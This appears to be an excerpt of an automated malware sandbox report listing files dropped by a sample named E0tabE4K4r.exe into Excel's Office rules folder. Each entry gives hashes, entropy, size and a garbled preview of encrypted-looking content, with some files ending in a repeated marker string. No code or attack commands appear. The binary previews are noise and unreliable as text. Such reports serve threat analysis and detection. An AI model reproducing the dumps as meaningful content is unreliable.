                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1498
                                                                                                                                                  Entropy (8bit):7.851596074179562
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gP/Z2Rm8Dm3bqWO5/DVo8JcvvK9/IiYrF0g5GpC+o/i2+A8h/2bD:gP/ZwP3WixoYcvyaugEpC5K2qhcD
                                                                                                                                                  MD5:C1D7A10763EE940B1CB658BCE709156E
                                                                                                                                                  SHA1:4DE58879245DEADEB1301F97F1562D39FB12C4B1
                                                                                                                                                  SHA-256:931708731AF7A8FB75A962FD1CEA97E37B5E27787A82AA55CA362CAF158D4D8E
                                                                                                                                                  SHA-512:AAD2754A83A74FD0D57B49E2A69A4A652853D5A15F5D1B2E5C88CDA136210EE1E4EA9E8C37440894DA82B3BBB91D2D876AF039DEE79124592AC4C873D7A9BE91
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml]44A.!. .x.o.C\]N.e2......x&:4o...(..Z."6m....N.'..5.E..'..q.$p...Z.^,.R&.!].(.c...I./.%Xl.....-.N..v..q....0.^x.v...u~...G.....H.......g-.I......@O...!.H.{._.er..r........gF.FS{.7....Y.-:.{.A.Wh.;#.)b4.ZV...\...H.....k@..K.TA..6c...-.Y0$...Y.~G..M...\..........1x$....[....bi.Ug.,.{.....=.....g.@..Z|....W/.$\...''.m......n.E..@a...zAl.0LE.........t.3n......L.A....J...W..x.Dw?vW.o...P. .%...y..c.........Yq.L.$y.7}6..Rz.G[<..'~0...{V..YG..6.O.B....4d...L..=....9......XV.&M..Nx8p0.o.Yw.G.o#H.....Y~..<!..z.7..!..g ...-JU.-.|..R-....[.}._.K.g....D...<...9...TDQ'--S.i)..4....>...tT.xB{.......G]......D3..0..Q...EQ.>A1..t...Y;............J...V..6.V..t.........z....BL..."....D...Gy.."X.4:.).>..b.s.jB.xi.s'.%.9..<...zV..6<.&>...a$*..........c).U...k...|....|....<..u..d.3;Nd.........p...G//::,r.V.9....jBrqy.....d..._b...|.30...5..Y.............o.#j.1V......V.ie.N.7..9....O.6PsL.?.;.o.?.YSMT..p...F..cy.N.&4+....A..@...\..R......P\.D..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324013v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1357
                                                                                                                                                  Entropy (8bit):7.819108682078353
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:43x58wClBeL/F3Y2rvpcJ9OVu9C3kIWTBgP2bD:o8PlBebF3pM9grWVgsD
                                                                                                                                                  MD5:09625FC5D3C5B789787718BD118FE288
                                                                                                                                                  SHA1:43CDF9A937B5F97461C0DA73F9E332085E6B6C5A
                                                                                                                                                  SHA-256:22D9EA03D368D184F6E08A3899F8D6E466A1019633F462647FD89584AC118092
                                                                                                                                                  SHA-512:89F6BF6DEFFD32CB125511CE9B5134F0B88F95C7739DB12735CBB7D9F5EC3BCBC87BE1653B6BEC186B9BDD0A5651844ABECB585422DEA71D275A9C7805208317
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlb.0{.....8.8.oz...!6.P..6.g0.Z...xI.=.q;..4Wl/......]0.....2....f.L...B4."..<..A..Rc.....0......|..{o.....".o........G=..y..@.6==.noHh.......;.f.g.A+...#4............s...^..j.a.9...E'.x.f..f.....Z"c..).U....*j.B...H..Q...@..Y.f...r...h.c.W<x..n....d.Y.k>.......]x1...1.....8..mj..f......A...N .g...-.*..y+x...n`.}.x..."6E.....P.....[.]...?...&.x.rNdm.......h.g..0.BUWf.....C.3....NH.nKr;......T....Vy..v....7.X..^.s..a..+.-...!\...A.B....k..ZF.A.ie.c....N..y.J..v;..}E...\...m..G_..K..g...`.i...j.=.U....]Ml..]....|.;).2F.W.X....Q.|...Bd. H."..ux..Bl.E:.....rK......'r......gN....B~n...N.2.1QH.....;."..sgX....*....B...*Q....eb\......$J?q.+........(.....p..1....:....re$+c,Q...R{..Z.*.|.F.3_..ZU.A.....Z...>^.{).Y!.'.....R)v..k...Q...S..+G.A..j..}...uXc....0.?...I..Ix..As....\.....Ts..)..Fj..21]..."@.).i,.....A..w.\...v.oY"..*.oXuT.).7.....d...QcM.]....Bcg@8........Aqf...y...J.....#.NY'.'0AE.Q..e...L.......<b%.}.PMN.j..s

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324014v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1049
                                                                                                                                                  Entropy (8bit):7.8060221380322625
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:RoGlhlMSzCn/sRQq809x+/dzIjA1KHjwSbSLnMbom1w82bD:RdHl5GqZv+VGA4wSKX0gD
                                                                                                                                                  MD5:BAF57203540F3DC7ECD707BCCD564FD2
                                                                                                                                                  SHA1:283D43C6544CBE413DD469A4011B0418849EA6E0
                                                                                                                                                  SHA-256:01F0DC63741572FAF9C92F640A322F51F67116DBF5973C3FC7D89EA9380E6836
                                                                                                                                                  SHA-512:86FAC6642E077901956CB6760BC9D2584163DD66A17CEFD4AC330D08CB11E9A70DFAEBD1890FB80632095FD3E89568640A5FDEA636C89C787D770719DF8ECF5A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.v..0D..E.).yL..6...J.+..-l..iY....-.Y.}.......E..s..,...%..gv.NT..nP..{.$..Ux..e.@.V.O.zv..(#...'....v|.\.$.e ~IF3.?..*I..yX..#.2<..J.R-$........L.M.u.@...R.lm.4,$..l9[.:....Js.l...O..s...c0.cC...Z.GVW?y..b.,..f..?....c3.y.9.{q?.....j...[...1@.S.$...T..........0.Hv.i!........#.dC..y....0fu...U.d..&....d........"..YW...^(......0.jH....../.!.Q.....R..!He.VV."....P..."...>......_}z.?]......PK..,.2..a.....\pG.y....M.&...=H.P.....e...k..Oi...o$.<..x..0g...(....r.6Z.WG7.B.^YN~..P...N..^..7.-..$D....+.M./.. |..@..l.T....%b......$....x{..-K..G.....x.......V.k5.7.".sb......u...k........#z....._.....1.6...W......R.......r.._.o4Ee.3..[.Vc....-....h..K..w.O...e,.....D2Q..E/.g\Z.....?zp....%XUR..m.F/..\.x..!x.6_.9t.R-h..~......*c9.....j.>..q~V.#..jW...c.......Hr%..80C.$.}....~n..s<.g2..^..'e....E.z......(..@.h81.......Sa....7p...!|.u{.&=|....v....GAW:.B6.JP^.P.Zn.E./......B.".G.y......i.q.../..#..y...9[..N$..WR.GK...mMsRxMUuXypapZbGOAfxD9pczHmW8

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324015v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1184
                                                                                                                                                  Entropy (8bit):7.833084757345626
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OnLxl1WrXenpZxgoXT0/l+uonBrZDsmWlOsk3hYdDp7NeqV2bD:Ontl1kXoxjq+JzSOFIDvuD
                                                                                                                                                  MD5:2BB3F3AE09C3C9ADDDB74941D71523F9
                                                                                                                                                  SHA1:F8143EAFBEB1FD1CA666180B04E06EC8CA4502BE
                                                                                                                                                  SHA-256:85F6D48668DAB691CBF22B4B94D36E81094B733711DDDCC213B4A5054C410C23
                                                                                                                                                  SHA-512:D6836EDC9FAF11D1D0A68E18E4341237A35FEBC4C6220788CAC573A83CF6B4D17D222FFC79E05DA892E1001CACF3CF38EC8A790FF58E0E17BCEF2A658C977EE6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....G.w.3.......6.3.=g.... +/lW.f.5~..!Y7p..........:R.h..._D y.Q.5..N.......?..|N.....w..$O<.Q..s._.....&..4v.Q.......@.,^.v).Uo...Y`.~.R..w.}!......+.....Z/r....M...._/;$E&Pn.m..N..>.p.c.0.S..i.!..O...[.@..!?Q+.C......l.d.o....<..T$<..5.7.(7#w.[5...a!...W..=...q...;M.......F.YY.(.v.....x3.Z..d..:.<....|c4.[./.....O|..].P.0~.,Z...vw.-g... .K..C.....C.[..G3..C.v..j......[#....Q....3Y..)_C.w....$7.`.=.r...s.l....{.\..Q........w..j(.....*..H....~.c#..".E.2.j...+.8h$.^..tF;.Q`...\4......3.%........!u......~...G.Q.(.K."..;F~...q..-R..*M.Y.:<.....7.p.p._.yl....'..."t.,.0..8pp.D.......`sh..s...X.hf........Ua...r....W..E..jb1..Q...j}...u..J?...)...K}....6.JF.-..HKKn2V.....V.G(.H.'.cr.@.......yu.*...-b.C....%...0E..$.[... .4....&....t1........4.>Y:U ..W...M..ct..8!gF.A.q.w+...].p.c...7........x...].....Ni...^Kpq...^:.G.S......m......8..v".8~.7[.|.6."S.S...]..A...eJ..r.:"..............g....<.D.y..B5.....f&n4E..r...ex.....v.s..o^.?.cL

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325000v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):9303
                                                                                                                                                  Entropy (8bit):7.979448666903267
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:fm+DkxplY5++9yvcHGv6WhHVG25um6hhrkJ2m1xYB:1DkPlY5LZmv6WZVG2WT2w
                                                                                                                                                  MD5:CD5A28CBD651FC2597917BAC82026EB4
                                                                                                                                                  SHA1:A9AFCADB13C94F889B2750148AB7CF95DF3C5149
                                                                                                                                                  SHA-256:3BF416609DCF4A3218BCF1471ADDC401DD127A4F2CCA141A40215833EE5E16AC
                                                                                                                                                  SHA-512:970DF07158805EDEF92C85375073259ABE03654230DC745F38D33D6E47BE451FC08FD9E9839590D8D1D8C294B8B55D177BB40F9569DD6E1506B003FA1E058274
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.-.......,....}./...QQ..u.1r.....j..<..(R.x.8`..`1......P..K.W.u...|....j.....X.)......4....X...:.I ...q{..j.;.n.s.$XI.&c.ux..Q..n.._.L.[G...Q..]iP}).....y..?.+N.Ha9./n:[..p....r0nw...gW.K......dxx..1U~_5\....k....gr....!j.u0..E......-.9........|L3..Z.z....e.5......f.....!.I>....q..T..j..P0#......w..u.....e."..OG...%./........t..|*..\N."+.....6..8.......t.a..I}..-.Q..h}x...].0...........D....}.......^.R.:....a.P.C..l..f.<v.Z|.aDDU.E...G.g5...+..G.....#]....59.I...z.OM.>.....WN.....z/..%K...........1t...s....LW'.s..R..zyB.^.....R...9N...q.Dn..e..O_y.7...'..wi.Fm|..DS(.n.....uTB...p....."7..1.#.s2..b{|...'.$%K...&.!J...-..q.%.p..3...l...Ca..'..o.dYU..v../.^H.....jr!x.q..o.....D..:i....T.\.WI82.._...4...U.#'../!.....\.ON....|.E....%5)..G...U...><.....,.R)h..*.R.1.xPZ..W......X....4.m.EM....Vs..[!49.B-....=.w...R.q.........D.......Eh.Y..Sm(..Qm...L...M...hZ..5..@.LX.%v...0h.D|F..0y.4...-.@.|.`.>{m....k{_.[....;..b4NX3... T..4

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325001v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2318
                                                                                                                                                  Entropy (8bit):7.914876218858833
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:uWwSOJnfDAF9zmWZAiIRo/CmMPIt65tcaWSxFZxkNSXLQSL0/D:uW7OBAF5miAiz/CmOItUtcWkkQGA
                                                                                                                                                  MD5:B673C1C98C7328CE93A02C41731CF756
                                                                                                                                                  SHA1:D8FF78DF200D551BD5616E24D556AB5864E4CACF
                                                                                                                                                  SHA-256:EF27C3D9D2A06A3821144166D2077ECF3CA4C346E706DDFEAA76BB5CFB50CA4F
                                                                                                                                                  SHA-512:A79C9B6A9CE12F75D24DC199FF447B9BF3A63714F35685D0ED136A065ED001B118D141764282AD36345300ACEB69D01E243E7CDB6E53B614096945524C0E71BB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml$.r..!t^)(h..@/.5...PR.4..`xu......Ql`.w......3..r..e..7]/.M...DmSK.Q}a...f.........Cs.e...=U..X..x.!...E.....f.Y$>l..*OU.~...nG.2.....T|Dy..h..F1..~X...U.......D"."....]..g. G..5.n:U.......%........$X-....j...%..0....n.e.>.,.+!...{P. .iT....6..,..Yw.....a.o..U#..}.|4<.J6zMa.Ehj.....].....1"IVr."f...DV.O..DE].E.[..Z-.r"......7..z..*.....s9.,.<.9.-....Frk..F. 9.l.....x.O..qZ......h..q......k..2g.hU...C..+V...K...6.8...1....TX.A.<zE..* O..:.).dp.&..B.V.._...VA..$e..H)...nC.' y]o...I.Zt.S;.&S..]..z% 6.\..WK.H(o...Dc4h@Y~Z.Ul....U.......a.KuX.\Pu....7...ur.)'.Vq....~y...&......V..R...|T:.U.x.v../..VE.a.0...F...0.2.5d.{.....Q....C.90V....Xa[?........<~h...u(......O..[F.0![.]..?.:4.J....[.S....:.[.>.W'...p...X.}...,......h.9.Y......1.$..M.fF.<.wN..5.....w..G....b.^F;E.*.e...lS..e...........N..A.I9.G.$.e?w.%."..ww.. .....7.n...<.....D5..e..o..[1,.m#.@..j.b+bK.J.%.9m.v....{.G...@q.....rF7..&.7D.0.D..O*...b...H.G...-.?....E....@2.....}y..44........

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325002v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2388
                                                                                                                                                  Entropy (8bit):7.926818309530786
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:WCBfWUSND8GKSopn347UmPATc94o80BON9Y6FGwkiupCOkWUDD:zOXNL5Ccp8Bg6kTTUP
                                                                                                                                                  MD5:3749DA68A6F13900B718B7E53C67BD9A
                                                                                                                                                  SHA1:761295032C19E62DDBD89BDFD626CD5A47919720
                                                                                                                                                  SHA-256:A5C1838FDBD3F11E86FFE241BDEB69C9619375F48EF1924470B829D4B0E845C7
                                                                                                                                                  SHA-512:815E1DC7ECCD46469E7D0B89DCCDB63018CB5DBE84156AF63024A11715AC59620303242B3C9EEA9B2C3AC14B24FE3A3564C36D58FB4FFBE82A139A4C93BA248C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.KC...\'0..5..BZ....8.o...^....{.....l....9..RMZO|....`...5u...4.....o.....)...K.....i...K>$..yc..C........#.m}....>..k.'"..p9....lP.c........_....."r.<....O.>..G......R..H...... g..K..rT..^0...c.....r.,;..48=..u%P...gH..o.hUo....fb-p..Q.....'2...u....>....7......p.R..t..GU#GzY_.....Wp..K,=..8..c....v\.,9U.B$_.@.)...u.#.j..?.v...&.H..+7......z.@...l..V....^z.....EO....b..s..B..._....;..GsA.j......u...2..6...R..g....=.".....*Q..3..%@.n.7W.H$..dl..Px..}..b-.(.L.k........[-P...2.0..G.E...u....'O.M...E_/Y...Q].."..;.z(,...H....&J7...Q..k..X..".m..2(...F...i.~....=.].....A.^.d.Jw..(.c....G.S.....#:S.#....)>.U.S..R.._H..N.Rq.Q..T._.ey].R....A.B*o^t.2.g+..*.Ta~.;.|........;.....M.fJ..p...:._.;.D...../...K.;.^.....!%y...1.../.[.,qLAK...Wl.....@.D^@...Yu4.|.t.Z.S......!di=....O....5....Y..be..^.o.....C.1....ND.4......yo.@.....]D-....k.5.n./`..7....@..7hI..l...>'$..'B.m.....U.)...T...P...%..d.............k....p....z.\4^.[N..I.....8!

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360000v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1197
                                                                                                                                                  Entropy (8bit):7.826809547303251
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gvRymvHNJzLdpKFM+rpflgk/xJ+HbIUKqKSyjFMZubFPraXoCUZth2bD:gvRHvLLdcFMEg0JEbjTKSyiaRwoCGt6D
                                                                                                                                                  MD5:047B057B6FD89F5B4CF0D60DD82C4D20
                                                                                                                                                  SHA1:A242CE328A071F7060E3568AE15C956246EC356F
                                                                                                                                                  SHA-256:623FFE3C2DDB6312C7034EFCE15C924699E595827F7C6287FBAD0D804DA4371D
                                                                                                                                                  SHA-512:FE95765505C41F8D9BE072AD3A262E6847568AEB638D1BBE8C922B786027DDC9940B10B5741E1C0FD48327C6728F8CE6A5E58AEDEA27CBB53392F21D3F2A2931
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.!'.............<....z....o.tE$:.9].A.9o.HD..A...+..P.|.1]..\.0.+.[.25Y....;X.}.2.m......Xe..'.$.!.KI...m..je....2....NU..z....GM.w...`8S.!....C:`..I....F0....j..`..AA)l...,!{~%..P.>........C-....]:..k........\.......*$L.N...}ARM.N.....-..?..ueC.....3Q.R..TY..{...../qFi......[....>....A.(.?.d..K.....[.R+.(..3.....8.cvw.....b.."....6D...Uf..2..z1...G=.......`..Y.4.e...qt.F..!..0P...K.r....J.$.I2]..a.HG!.L..a...._l.RS........n\...A;.W...n./r..m....^..H.`9.O.A...\.L..$_cq}....2,m~[..&.Y....Qh5(.../."c}.%t0....Z...^k.E.H.W....]!.....N.c.L.F=...A=..J^A~..y.f..[.<..........6qb"H.Z.5.L.|.o....j...B%.....4.=....A>.....;1.;.'..FI....lK.....0.W......._.GP#...!......8.p[.......fP..4....+....B.c9:...J'......A....xc...4....f.TX.....Z./...j.W.Z>u.f.{.C!.p.o...y.p.|....4.qS/..].)."...C..P.|.p....U.........0...N..j...s...\i........+.k.r..Z^.K.",..........O.g...)...`.D.'Y......K.o..........X....p...2.E>y..9."._6ezQ....a..Q^.Af.&

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360001v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):771
                                                                                                                                                  Entropy (8bit):7.729083984675611
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:eJjW0pAXOIeRDdTJy8qfdFcXwmweQeMaazjbMHTV2bD:eJq0yXOIelypdFFeQTpzjbMH6D
                                                                                                                                                  MD5:B649F84027ED7B83898875059C4E7BE8
                                                                                                                                                  SHA1:4413907766AB7D69CFCF13EF90E701C3E7026E0F
                                                                                                                                                  SHA-256:9AF40B3EA8CD34130EEC45175FA6D461E1F434915C17929867F4597B7F6CDE0E
                                                                                                                                                  SHA-512:ECE73E2472E5CFF2C80EDF73A425772A63BB1E3A97A591DA1EC0D2E622930A6AA6D9D6C5556C43802E42679F314ED4BF2872FEA149186E3C2BC35C1263C9BAE8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.65.J..u....N,C..".Ku.V+.n[]?5.#..&.7r...3...{-o.-.:...~..K0..h..,...%5..aB.t1G2u.......H....'iqm..*.l.z...K.........F...'.T..y._..b..d@.1H.....i]a.c.........l;........". .x....%}..o.+.....tu/.Y.g.FZj.H#V`S/....4..|...a..j#.(....D.OO^.h[.}.?UP...._..K.*.pA..b.i<].N7..??....h..T...a...._.?.#f...a.E.k.....6..Y.io.c..2bd.....:......m.6OY.m........`=)..'.......8..5..u.H..|2[m.I......s.H.....KA_G.\.u..,Q...[.*w....t)...E..3..&k....(.]...u..uZ.l....J..,....AB.A....1....:.........?..n..'....y.Mid..q..K....S....4L9..j9V.....O.R..GE>..F.....*H..a..9\x.T..7.E....m.... 8[#x ...s.L.a..&....a.....1.t.1...0Le'.C.<-....~.G..6...HO........._...T..9...+...K.f..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370000v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):863
                                                                                                                                                  Entropy (8bit):7.750305766363616
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BQRGFFQ2v4f1y2UyzO/X9Q0yY2UQwhr+2bD:B4KnvezUySX9REUlZlD
                                                                                                                                                  MD5:7B1705D1E99D583F9E8C02016856BE9D
                                                                                                                                                  SHA1:A24A681CD8632BB4FE55A0AC5F923208E233EB58
                                                                                                                                                  SHA-256:FDE8B66963B2EDD9566DE04358E89F89F62E1BC85D16817CC8FAFBE31D06DF1C
                                                                                                                                                  SHA-512:4202C21988080772F432E5B428DDE1BA97357E3A6EFE8ADCF3E5EB61D34BA0BFE93724298C9F9A6ED7D2B962C5428DC52B1A66E5FC456C1FE72257B136983FEB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlKq+b)..).C.....='......>....*t}.[........wS..].."........6,.....b.."Ex.h.C...dg}c..J3.S....TC.qc.tQ.uFr.....P..$.....?...-...LZ.D..v%.b."..0VI.F..C.|.Z1.ms...o.~.A...4$[......L..d.$........0.&...."qn].q..,....7..-..s...(.lM.iY....}..0....v....#........p.R.!.c.....j<..U..6..Oy.0.=...;...*...#.w...RX....Sb.hk.Ov...^+..X...5..?M.7y.4!.~..j.L..."..z.b.B......i.}.TJr.)7...eR.|9,...^.... ....q;9Qe.)RO.K..4t.O..3..F 6U."..1.P...R...!..,.g.v....*Q.Br.mK.0.....>.D..3+..P.........!.v..q..}....P...x...D..}A..iro..U.ou.L.)....W|0./|Y.....O...9O0y},..W}..qe..HC..$./)..W..Dt.....e.y..af_..:..5..a].*BSB:9%...pG6v..jSU>.@..$...Y.....<@p,......N...#..P....b.{!^.|...&..[.N.MU...0S9e\...EE..Y...7.gI.....h7...w....#.kNp..1Y...,._!yq.,p..5.K]i......&....b.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370001v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2604
                                                                                                                                                  Entropy (8bit):7.930131411134224
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:uraHY9QSn3GixrNC0AzJNmstAdNWii1IHMMFzVLt12bJrPyIjXO/Oh1fD:caHkQWhjbcINWBWhNjoJPyIlF
                                                                                                                                                  MD5:C151F9464CE18EF757E30306695C635C
                                                                                                                                                  SHA1:43D3BFFFFEB02785378377EDE955491E02470BAC
                                                                                                                                                  SHA-256:F4B9FB8CEC8A112052ABD231CF05587A05B6FD49C43AB3804E9F638EC2C25484
                                                                                                                                                  SHA-512:AEABBD217C61DF15FF026E890666B87D74C3495C46E26FB86334D38124FC6161A209CA2F5AF275CB002328BB855020DAE1FB4D7BF4CECBDCBB3F2F3C8622F649
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..X...9TI.....:....]. ..\..O.}..S...H....v...i...c.l.&...0...k.. .."..{....t~2.`,P.d.O.d.T(..s.@OC.)e._..0.1...(...C.....P..p.~..l/g..B......\6..W.v..K...m'.75=..:.C.. .t.E{..,o...C v...e9..O)K.av.\..2....!.k7...O....S...n...O..*.(...l.c.R7~'*.6....'W9..3...~......"..(Z.._.yE.;?....."..'..M..%..M.(.{.X....'...d....<.fp..Ke>`...$.5.(di"g.N.......la.....@gx!D,q.L"N....Km..gY..a.EF.F...?..R...........W...p......|4.].F;.P.....v..i.._"...b<...e.W.....qJ.....M......`...0..<....Fs_..]V{..'.....g.BM'w...V=.;,..(.4.Q..G;..bk..Y.11|.n.....}.x.C..3...SK.@.i.+..e....X.:...8-....._2.....v..|q........U..3.v...e.I._.K.Py!2E..m...{..H9...WX+.jr.+.s..R.......Z~..GR.v.b.%.WG|..p.....HvY.....Y........~.t....B.$..wH.~;...C;.......7.....q...2u...#........Zje....\..Q.TV.H.5.|.1S.&.qh..x..jf..'Q..\.y.h.S.8.~J...T..G%+.l..1~B...4 S.Z...M8....(.&.;.....:%......t..n.iD..2.aRL..C...q.1..5%.p...../2OU{t.#$k.j.}....f._Kb+.U~...z.1.7FZ.&r..u...N[di.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370002v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6109
                                                                                                                                                  Entropy (8bit):7.971662138321666
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:wT3XJpZVEQcLLnR6rZpD0P0Sen3AUBG88cwNuFlWrTIB97+nuTrwuJWVjDCMjKXq:wTnK3M1Gtenw/8pjgTq78ieDrjwgVr
                                                                                                                                                  MD5:D0AE92B50F3D2178A73BAF8D7A306ACA
                                                                                                                                                  SHA1:656184E60DE6F0E2EFED271B782AB3C54EB0FF18
                                                                                                                                                  SHA-256:4D4A24399AAE9923C2CE264322741E477DCFF848A54F79B56F9AC8E6508D650A
                                                                                                                                                  SHA-512:A5392D6AB6B43FBA423198E6DA66BE1223B4F00AD9F8F4BAD3BF5551BC0280B0E7A2A22271F91755CA2E9C5FBF72FD58B68C9661A8513BD0ECD99A20C790C76D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..?...2.....[.L..2M..X1.....~..6........:...x#..kC\..4.:.z.^......]..z.sL.X.c{.W*9.UT.4.h.E.Ov....8.........:a.....m .2.W.-..`N.s...O..0Mg|%.R..-.X.C..<M.....|m.,..|>....EU..|.c...rx...Rh..s^......qEL.a=.h..n..F.S...)U.,..7+.-&E.^...X%...E.F.Y.QG.......".?..s...PMs.el l.-..zer..U.h..jy.dK....")y.L.B:B~.u4....[..lk..V..r...XF0F7.C.*.......A.+.!....L.."..........S.x3J...&CeA.W.K.. ...$%.1l...D..$..t..S..sz:dB....o.^.....R.3.w...u....#..n.4.6.5..B...j..9..`..(..GFY...%..K....t...uf.,/.... .D.1B.kL...<.Q.....*.L....kE1mI..f...-..i..e.A.O.b..A!.\2..v.VT..q?P.-C...k .......fXz.I..2 ...75......../..{m.r>....#>.~....c.K...oYd.'..30.s.}x..&...9r{S#m...%5..Fl.g.MM.<.ej.i.......9.y|..`zt..3U.@..6..6.-QI..^...#8.C.c}.E.FXJ'.5v.....1,.d8w..P>A..}.:.....p..1...d.w..c...<x.@..4....`.'.cqJ..... .b...F..-Y..'..."..\.^.A..Bt<.....Y.......g....-q.L.......M...2..F...:...1.......m...P.0..s...[=.....[..rp.%}...u...tI.Z.....4o%..y...L............x...C15.F$.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370005v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1454
                                                                                                                                                  Entropy (8bit):7.854377254283083
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:MnTJ52P8V2Bk4ykIAdb8fy+ZPoHWiFocC3UHNQfkNzbPdTa8h8D6sdsdde67hDKS:SsSWPf+ZPofiZ0NhFTP8D36T3D
                                                                                                                                                  MD5:D46C7BF7AD0575AA516321BD17AADCC8
                                                                                                                                                  SHA1:8EDCD814CB1188C05830F3196156C24A035296BF
                                                                                                                                                  SHA-256:9D0DC94B198D54412C0AD4E5F2AE23073D66738E76A4EA85E783972F9DA9E7FD
                                                                                                                                                  SHA-512:77D63297BADFF5FAE5DFE095268B98D812DD2B92903B12DA205DE46043726B67B9516A1D4EF0A6AC846B3FF3EAA9144363D5CACD7D0C1AF980B40E88B7CF8AB8
                                                                                                                                                  Malicious:false
